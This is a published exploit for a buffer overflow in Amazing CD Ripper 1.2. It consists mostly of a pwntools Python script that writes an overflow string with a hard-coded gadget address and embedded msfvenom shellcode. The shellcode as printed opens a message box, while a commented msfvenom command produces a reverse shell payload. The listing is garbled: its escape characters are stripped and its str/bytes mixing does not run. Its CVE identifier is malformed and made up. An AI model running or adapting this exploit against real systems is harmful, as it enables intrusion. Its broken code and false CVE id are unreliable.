Authored by Hejap Zairy

Amazing CD Ripper version 1.2 suffers from a buffer overflow vulnerability.

# Exploit Title: Amazing CD Ripper v1.2 - Buffer Overflow 
# Exploit Author: Hejap Zairy
# Date: 03.08.2022
# Software Link: http://www.shelltoys.com/cd_ripper.exe
# Software Link: https://web.archive.org/web/20160313071152/http://www.shelltoys.com/cd_ripper.exe
# Tested Version: v1.2.1
# Tested on: Windows 10 64bit

# 1.- Run python code : 0day-Hejap_Zairy.py
# 2.- Open 0day_Hejap.txt and copy All content to Clipboard
# 3.- Open Amazing CD Ripper and press Enter Code
# 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code'
# 5.- Click 'OK'

# Author Code By Hejap Zairy
#CVE-2022-0x515
#!/usr/bin/env python

from pwn import *

# Builds the overflow string and writes it to 0day_Hejap.txt; per the header
# notes the file content is then pasted into the application's 'Enter Code'
# field (the overflowed input), so the vulnerable sink is a clipboard-fed
# text field rather than anything the script itself touches.
# NOTE(review): escape backslashes appear to have been stripped from this
# listing in transcription ("x41" was presumably "\x41"; the DLL path in the
# comment below has likewise lost its separators), so literal lengths and
# offsets as printed cannot be taken at face value.
# NOTE(review): the header's "CVE-2022-0x515" is not a well-formed CVE id
# (those are CVE-YYYY-<digits>) and should not be cited as an assigned one.
buffer = "x41" * 1016  # leading filler; presumably the distance to the overwritten return address
# 0x100017a1 : push esp # ret | null {PAGE_EXECUTE_READ} [akrip32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0rc2 (C:Program Files (x86)ShelltoysAmazing CD Ripperakrip32.dll)
# The module above is reported with ASLR, Rebase and SafeSEH all False, i.e.
# it loads at a fixed base, which is why a hard-coded address is usable even
# on an OS with ASLR enabled. The mitigation gap is in the bundled third-party
# DLL (apparently not linked with /DYNAMICBASE or /SAFESEH), not in Windows 10.

push_esp = p32(0x100017a1) #push esp ret ret from akrip32.dll
# p32 (pwntools) packs the gadget address as 4 little-endian bytes.
# 15 NOP bytes (0x90) placed ahead of the shellcode (a str, not bytes, as printed).
nops = "x90" * 15 #515 tshhh theardlooo love Malware
#msfvenom --arch x64 windows/x64/shell_reverse_tcp lhost=ip lport=443 -f python -e x64/shikata_ga_nai -b "x00x0ax0dx20xff"
#msfvenom --arch x64 -p windows/x64/messagebox TEXT="0day Hejap Zairy" -f python -e x64/shikata_ga_nai EXITFUNC=thread -b "x00x0ax0dx20xff"
# The bytes below correspond to the second command (messagebox), not the
# first: the last three lines decode to the ASCII strings "0day Hejap Zairy"
# and "MessageBox", so this PoC pops a dialog rather than opening a reverse
# shell. Useful for triage: the published payload is benign as printed.
# NOTE(review): both msfvenom commands specify --arch x64, while the gadget is
# packed with p32 and the module path is under Program Files (x86); the
# inconsistency is in the listing as written and is left as the author had it.
buf = b""
buf += b"xfcx48x81xe4xf0xffxffxffxe8xd0x00x00x00"
buf += b"x41x51x41x50x52x51x56x48x31xd2x65x48x8b"
buf += b"x52x60x3ex48x8bx52x18x3ex48x8bx52x20x3e"
buf += b"x48x8bx72x50x3ex48x0fxb7x4ax4ax4dx31xc9"
buf += b"x48x31xc0xacx3cx61x7cx02x2cx20x41xc1xc9"
buf += b"x0dx41x01xc1xe2xedx52x41x51x3ex48x8bx52"
buf += b"x20x3ex8bx42x3cx48x01xd0x3ex8bx80x88x00"
buf += b"x00x00x48x85xc0x74x6fx48x01xd0x50x3ex8b"
buf += b"x48x18x3ex44x8bx40x20x49x01xd0xe3x5cx48"
buf += b"xffxc9x3ex41x8bx34x88x48x01xd6x4dx31xc9"
buf += b"x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0"
buf += b"x75xf1x3ex4cx03x4cx24x08x45x39xd1x75xd6"
buf += b"x58x3ex44x8bx40x24x49x01xd0x66x3ex41x8b"
buf += b"x0cx48x3ex44x8bx40x1cx49x01xd0x3ex41x8b"
buf += b"x04x88x48x01xd0x41x58x41x58x5ex59x5ax41"
buf += b"x58x41x59x41x5ax48x83xecx20x41x52xffxe0"
buf += b"x58x41x59x5ax3ex48x8bx12xe9x49xffxffxff"
buf += b"x5dx49xc7xc1x00x00x00x00x3ex48x8dx95x1a"
buf += b"x01x00x00x3ex4cx8dx85x2bx01x00x00x48x31"
buf += b"xc9x41xbax45x83x56x07xffxd5xbbxe0x1dx2a"
buf += b"x0ax41xbaxa6x95xbdx9dxffxd5x48x83xc4x28"
buf += b"x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72"
buf += b"x6fx6ax00x59x41x89xdaxffxd5x30x64x61x79"
buf += b"x20x48x65x6ax61x70x20x5ax61x69x72x79x00"
buf += b"x4dx65x73x73x61x67x65x42x6fx78x00"
# Trailing filler; its length is derived from len(buffer) rather than from a
# fixed total, so the final payload is more than twice the initial buffer.
padding ="C" * (len(buffer) - len(push_esp) - len(nops))
# Concatenated in the order the overflowed stack is expected to see them:
# filler, return address, NOP sled, shellcode, filler.
# NOTE(review): buffer/nops/padding are str while push_esp/buf are bytes, so
# as printed this concatenation (and the binary write below) is not valid
# Python 3; the listing does not run in this form.
payload = buffer + push_esp + nops + buf + padding
# Writes the payload to disk. The bare except below swallows every error
# (including KeyboardInterrupt) and discards the cause; f.close() is redundant
# inside the with-block, which already closes the file.
try:
with open("0day_Hejap.txt","wb") as f:
print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("[-]File cannot be created")


# Proof and Exploit:
https://i.imgur.com/3r5sKNo.png